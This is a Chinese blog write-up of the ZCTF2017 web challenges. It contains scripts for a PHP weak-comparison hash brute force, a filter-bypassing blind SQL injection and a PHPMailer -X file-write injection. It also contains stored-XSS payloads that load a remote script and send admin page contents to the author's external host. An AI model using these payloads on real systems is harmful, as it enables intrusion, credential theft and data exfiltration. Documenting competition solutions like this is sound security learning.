ZCTF2017 WEB Writeup

最新推荐文章于 2023-05-22 00:15:00 发布
最新推荐文章于 2023-05-22 00:15:00 发布
阅读量3.7k 收藏 1
点赞数
分类专栏: WriteUp Web 文章标签: web ctf Writeup zctf2017
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19876131/article/details/58264193
版权
Web 同时被 2 个专栏收录
34 篇文章 2 订阅
订阅专栏
WriteUp
24 篇文章 0 订阅
订阅专栏

由于博客迁移,本博客短期内会继续同步更新,
本文新博客地址:http://bendawang.site/article/ZCTF2017-WEB-Writeup

web-1

进去扫一下目录发现有备份文件如下,

<?php
$flag = $_GET['flag'];
if ($flag != '15562') {
    if (strstr('zctf123', 'zctf')) {
        if (substr(md5($flag),8,16) == substr(md5('15562'),8,16)) {
            die('ZCTF{#########}');
        }
    }
}
die('ha?')
?>

简单阅读时候发现一个双等比较,那么看看等号后面的值是个0e开头的值,也就是一个弱类型比较了,爆破就好了,代码如下:
注意这里0e后面的值一定要是0-9,应该能够秒出答案的。

import hashlib
b='-=[],./;"1234567890abcdefghijklmnoprstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

def find(str1):
    if hashlib.md5(str1).hexdigest()[8:10]=='0e':
        flag=0
        for i in hashlib.md5(str1).hexdigest()[10:24]:
            if i>'9':
                flag=1;
                break
        if flag==0:
            print str1
            input("success")
    if(len(str1)>8):
        return
    else:
        for i in b:
            find(str1+i)
if __name__ == '__main__':
    find(a)

web-2

这里进去看到一个网站,简单扫了扫目录也没发现什么问题,后来在contact.php那里的表单提交处发现了一个可以提交东西的地方并且有比较明确的返回,然后大概猜测是个xss,多次尝试之后发现很多东西都被过滤了,观察同源策略,目测只能是使用script标签,但是过滤规则相当严格,折腾很久之后想到了用sourceMappingURL,这个东西恰好前段时间写博客调试js的时候用到过了,主要是用于方便调试的,有兴趣的可以自己去谷歌学习下。另外就是题目刚开始过滤了冒号无法使用http://,后来好像有修改了,放开了过滤,不过通过//www.XXXXXX.xip,io它会默认为http协议,这样就能绕开过滤了,下面是截图
这里写图片描述

这里写图片描述

web-3

首先是apk一开始是一个登陆框,经过逆向,发现登陆网址,以及apk向网址发送的加密算法,有了加密算法,我们就可以伪造成apk向网址发送请求了,接下来就是注入了,同样是被疯狂过滤,但是发现服务器过滤了union select,但是二者分开单独都没有被过滤,所以寻找代替空格的特殊字符,发现就只有union%a0select没有被过滤,写代码的时候注意替换成union\xa0select,之后通过order by判断有3个字段,然后发现过滤无法查询系统表,也无法获取表名,猜测表名是password和username,这两个单词也都被过滤了,无法获取表名,想到通过join引入新查询组合替换表名,但是这个时候发现小括号被过滤了,此路不通,换个思路,wargame.kr的zairo有个思路是通过联合查询然后根据第几列排序,由于只显示查询结果的第一行的值,就可以根据这个回显来判断这第几列上值的大小关系然后爆破结果。
即例如我输入如下:

admin' union\xa0select 1,2,'a' order by 3 asc#

第三列是密码所在的列,如果回显是2,说明密码第一位大于a,否则说明第一位小于或等于a,如此逐位爆破密码即可。脚本如下:

import requests
r=requests.session()
def encrypto(data):
    data=data[::-1]
    key = '1470'
    result = []
    for i in range(len(data)):
        tmp = ord(key[i%len(key)]) ^ ord(data[i])
        result.append(tmp)
    return ''.join(['%.2x' % i for i in result])


def getpassword():  
    ans=""
    for i in xrange(32):
        for j in xrange(30,127):
            username = "admin' union\xa0select 1,2,'"+ans+chr(j)+"' order by 3 asc#"
            #print username
            password = "1"
            param={
                "username":encrypto(username),
                "password":encrypto(password)
                }
            result=r.post("http://58.213.63.30:10005/",data=param)
            #print result.content
            if "admin" in result.content:
                break
        ans+=chr(j-1)
        print ans

getpassword()   #得到密码hash是 5af1ab27b1be8bb8e39bdf98cd2cfce4 解出来 CleverBoy123

拿到密码之后登陆进去发现有个可以让你向服务器提交一堆关于email的参数,联想到之前的phpmailer的漏洞,也懒得多想先随便写个php试试,后来看到官方hint说根目录不可写,那么扫一下目录发现存在一个uploads目录,往里面写吧,一写东西立马就返回了flag。最后代码如下:

# encoding:utf-8
import requests
r=requests.session()
def encrypto(data):
    data=data[::-1]
    key = '1470'
    result = []
    for i in range(len(data)):
        tmp = ord(key[i%len(key)]) ^ ord(data[i])
        result.append(tmp)
    return ''.join(['%.2x' % i for i in result])


def getpassword():  
    ans=""
    for i in xrange(32):
        for j in xrange(30,127):
            username = "admin' union\xa0select 1,2,'"+ans+chr(j)+"' order by 3 asc#"
            #print username
            password = "1"
            param={
                "username":encrypto(username),
                "password":encrypto(password)
                }
            result=r.post("http://58.213.63.30:10005/",data=param)
            #print result.content
            if "admin" in result.content:
                break
        ans+=chr(j-1)
        print ans

#getpassword()   #得到密码hash是 5af1ab27b1be8bb8e39bdf98cd2cfce4 解出来 CleverBoy123

def next():
    r=requests.session()
    param1={
        "username":encrypto("admin"),
        "password":encrypto("CleverBoy123")
        }
    result1=r.post("http://58.213.63.30:10005/",data=param1)
    param={
        "username":encrypto("admin"),
        "password":encrypto("ClerverBoy123"),
        "mail":encrypto("aaa( -X/var/www/html/upload/bendawang.php )@qq.com"),
        "title":encrypto("bendawang"),
        "body":encrypto("bendawang")

    }
    header={"Cookie":result1.headers['set-cookie']}
    result=r.post("http://58.213.63.30:10005/mail.php",data=param,headers=header)
    print result.content
    result=r.get("http://58.213.63.30:10005/upload/bendawang.php")
    print result.content
next()#zctf{c20cd895e09260b709fd3537361da181}

web-4

讲道理这道题服务器bot背锅好吧。
这道题登陆进去发现在profile.php下面nick输入框里面存在xss注入,会在index.php里面回显触发,过滤一些东西但是都能双写绕过不影响,加上bugscan那里可以提交一个链接给管理员访问,接下来就是想办法xss管理员的cookie或是其他东西,构造一个html如下:

<html>
<head>
    <script src="jquery-3.1.1.js"></script>
</head>

<body>
<form action="http://58.213.63.30:10003/checkProfile.php" method="POST" id="profile" enctype="multipart/form-data">
        <input class="form-control" name="nick" id="nick" />
        <input class="form-control" name="age" id="age" />
        <input class="form-control" name="address" id="address" />
</form>
<script>
$("form input:eq(0)").val("\<scriscriptpt src=http:\/\/104.160.43.154\/a.js\>");
$("form input:eq(1)").val("123");
$("form input:eq(2)").val('\<\/scrscriptipt\>');
$("form").submit();
window.location.href="http://58.213.63.30:10003/index.php";
</script>
</body>
</html>

然后在vps上放置的a.js如下:

$.get("http://58.213.63.30:10003/index.php",function(data,status){
    $.get("http://bendawang.site/?a="+escape(data));
})

这样通过修改js,就能访问管理的各项信息,发现管理没有cookie返回,note也没有数据,之后x到的后台进去看到了大家的payload,发现有人在search下面做文章,想到note没东西可以去search那里搜索,在写个脚本爆破搜索试试,这是在后台上看到的大家payload,当时直接拿过来用了

<html>
<head>
    <script src="jquery-3.1.1.js"></script>
</head>
<body>
<script>
tab="0123456789abcdefghijklmnopqrstuvwxyz}"
str=''
$.ajaxSettings.async=false
while(true){
  for(i=0;i<tab.length;i++){
    //console.log(tab[i]);
    flag=false
    x=$.get('http://58.213.63.30:10003/search.php?keywords=zctf{'+str+tab[i]);
    if(x.status==404) flag=true;
    if(!flag) break;
  }
  str+=tab[i];
  console.log(str);
  if(tab[i]=='}') break;
}
$.get("http://bendawang.site/?a="+escape(str))
</script>
</body>
</html>

不过最后bot也没有临幸我,没能拿到flag,不过讲道理这个锅不背。

Bendawang
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF内存取证三项.7z
11-16
CTF取证分析赛题,对学习有很大帮助。
ZCTF-2017-web-writeup
dengzhasong7076的博客
02-26 288
web2 页面有很多搜索的地方,但是感觉都是死的,最后发现留言之后会有一些信息返回,比如说name的长度或者是哪些字符或者字符串不允许。 POST /a0f1b29db350fdac2ad6dc4cb92dbd2b/message.php HTTP/1.1 Pragma: no-cache Cache-Control: no-cache Referer: http://58.213.63...
ctfshow web入门 php特性
Sentiment的博客
04-11 5103
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
CTF必看~ PHP反序列化漏洞6:绝妙_wakeup绕过技巧
最新发布
Eason_LYC安全白帽子的成长博客
05-22 3084
_wakeup()是 PHP 中一个特殊的魔术方法。它在反序列化一个对象时被自动调用,允许开发者在对象从序列化格式还原为可用的 PHP 对象之前对其进行某些特殊处理。这个方法可以接受任意的参数,但在实际使用中,它通常不需要参数。
zctf_2016_note3 详解
One_p_Two_w的博客
11-04 486
zctf_2016_note3 详解 题目可以在buu上找到,ibc版本为2.23 和wiki做的不一样,wiki那个我还没看懂,改天再研究研究orz 查看保护机制 题目分析 是个菜单题,提供了新建note、打印note、编辑note、删除note四个功能 添加note ​ 最多添加七个note,每个note大小在0-0x400之间,申请到的堆空间地址会放在ptr指针处 漏洞在edit功能模块 ​ 当a2 = 0时,由于i为unsigned_int,-1相当于无穷大,会造成无限制读入,令我们可以覆盖后面
unlink zctf 2016 note3
qq_36918532的博客
01-19 2400
这个跟note2很相似,仍然是一个unlink问题,,,不同的是没法打印泄露了 详情请参考,note2 查看检查 在IDA里面看,发现其有增加,修改,删除,打印的功能 其中增加的功能: 发现0x6020c0地方存放的是当前堆ptr,0x6020c0[i+8]存放的是其大小 也就是其布局是这样的:cur_ptr | ptr0 | ptr1 | … | ptr6 | cur_size | size_ptr0 | size_ptr…| size_ptr6 在输入size有个函数sub4009b9()中的sub
zctf_2016_note3
z1r0的博客
02-25 160
zctf_2016_note3 查看保护 这里假如size为0的时候,会有一个非常大的溢出(整型溢出)。因为i是unsigned类型,而a2是int类型,比较的时候会溢出。0 - 1 > i 攻击思路:创建一个size为0的堆块时,在edit的时候就可以将下面的堆块进行覆盖。这里笔者采用的是unlink攻击。具体的攻击方法见z1r0’s blog。通过unlink劫持got表。将free_got改为puts_plt这个时候可以泄露libc。再将atoi_got改为system,再传入/bin/sh
百度杯CTF比赛 九月场——123
夏日 の blog
03-20 1136
目录题目描述writeup小结 题目描述 writeup 打开页面是一个登录页面,查看源码发现提示语句 访问user.php发现界面为空,此时尝试打开备份文件,发现user.php.bak,下载后发现用户名,根据上述源码提示采用burpsuite爆破,配置如下,注意选取Clusterbomb模式(因为要尝试多个payload,详细见:Burp Suite Intruder4种攻击类型) 三个...
ZCTF-2017 比赛总结
weixin_30610755的博客
02-28 209
这次ZCTF办的还是相当不错的,至少对于Pwn来说是能够让人学习到一些东西。 第一天做的不是很顺利,一直卡在一道题上不动。第二天队友很给力,自己的思路也开阔起来了。 关于赛题的优点 我觉得这次的Pwn300-class是一道比较有意思的题,整数溢出并不难找。比赛过程中可以很快的发现这个漏洞,但是接下来的利用比较头疼,我一直到比赛结束都未能想到是通过setjmp这个函数进行利用的。 这是我第一次见到...
ctf-php反序列化绕过__wakeup
qq_32445755的博客
05-19 2053
注意:PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法。所以在定义类方法时,除了上述魔术方法,建议不要以 __ 为前缀。 __wakeup()是用在反序列化操作中。unserialize()会检查存在一个__wakeup()方法。如果存在,则先会调用__wakeup()方法。 部分代码 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 此时需要绕过__
zctf_2016_note3(整数溢出,unlink)
m0_51251108的博客
11-06 197
zctf_2016_note3: 好像没show? 逆向分析: 主界面: add函数: show函数: show假的 edit函数: 我们跟进这个函数, size-1跟一个无符号int作比较,如果size为0的话,就能造成任意大小堆溢出 delete函数: 指针释放干净了 思路: 我们申请size为0的chunk堆溢出,伪造chunk,触发unlink,改写free的got表为atoi 在填入/bin/sh exp: from pwn import * #from LibcSearcher i
CTF web总结
热门推荐
giantbranch的专栏
04-09 7万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/50959166 本文根据自己的做题经验及各大练习平台不断更新,若我最近懒了,没怎么更新,请在下面提醒我或鼓励我 仅作为自己的笔记及刚入门的童鞋,大牛勿喷 基础篇   1.直接查看源代码   http:/...
NJCTF 2017 web Writeup
Bendawang's Blog
03-13 8892
NJCTF 2017 web Writeup
zctf-2017-pwn-sandbox
weixin_30907935的博客
03-12 465
才接触二进制不久,第一次写博客,萌新一只,zctf被表哥们虐得体无完肤,只能坐等writeup,最近参考flappypig的writeup研究sandbox这道题目,用了三天,记录一下。 ps:基础太渣,可能有理解错误的地方,大佬莫笑,麻烦大佬在评论中指出。。。 接下来进入正题 这道题有两个二进制文件:sandbox和vul。用sandbox运行vul程序,其中vul程序存在栈溢出...
BUUCTF:[XMAN2018排位赛]file
末初的CSDN博客
11-23 1259
https://buuoj.cn/challenges#[XMAN2018%E6%8E%92%E4%BD%8D%E8%B5%9B]file 先挂载起来看看 并未找到flag,ext4文件系统尝试使用extundelete恢复被删除的目录或文件 flag{fugly_cats_need_luv_2}
CTF——南邮攻防平台(web
加载中...
11-17 5873
一、签到题火狐浏览器中打开页面,F12打开开发人员工具查看网页源代码,发现flag:二、md5 collision题目所给的php源码如下:<?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo
BUUCTF:[XMAN2018排位赛]通行证
qq_46230755的博客
12-16 1414
经典套娃题目了: 题目:a2FuYmJyZ2doamx7emJfX19ffXZ0bGFsbg== 很明显第一步是base64: 利用base64解密网站解密得到 kanbbrgghjl{zb____}vtlaln 第二步是栅栏密码: 利用栅栏密码网站进行加密,Key等于7.(这一步一开始以为是解密,做了很久,快吐了) 最后得到 kzna{blnl_abj_lbh_trg_vg} 第三步是凯撒密码: 一样是利用凯撒密码网站解密 最后得到 xman{oyay_now_you_get_it} 把开头换成f.
第四届“”世安杯“”线上赛题解(Web+Stego+Misc+Crypto)
Assassin
10-08 4647
题目很多原题,但是还是考验了不少的知识点,就算是原来见过的也当做是复习了一下知识点了。 WEB ctf入门级题目 非常水的一道题,可以看到源码,然后利用%00截断就可以通过了 曲奇饼 原题,直接利用line和file来泄露文件内容,通过臊面轻松知道存在index.php,然后利用一下得到源码审计 #_*_coding:utf-8_*_ import requests s=r
PhpMyAdmin 网站路径信息获取
wodafa的博客
03-13 1万+
1.环境说明 本篇学习总结,主要以apache中间件为主要环境进行研究学习,其他中间件情况思路基本类似,这里不做具体展开说明。 2. 基本思路 2.1.思路说明 找网站的安装路径,其实就是通过“配置页面”或者“配置文件”找到Document Root 指向的网站路径位置,而Document Root最常见的地方就是 phpinfo.php页面和httpd.conf配置文件中;

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值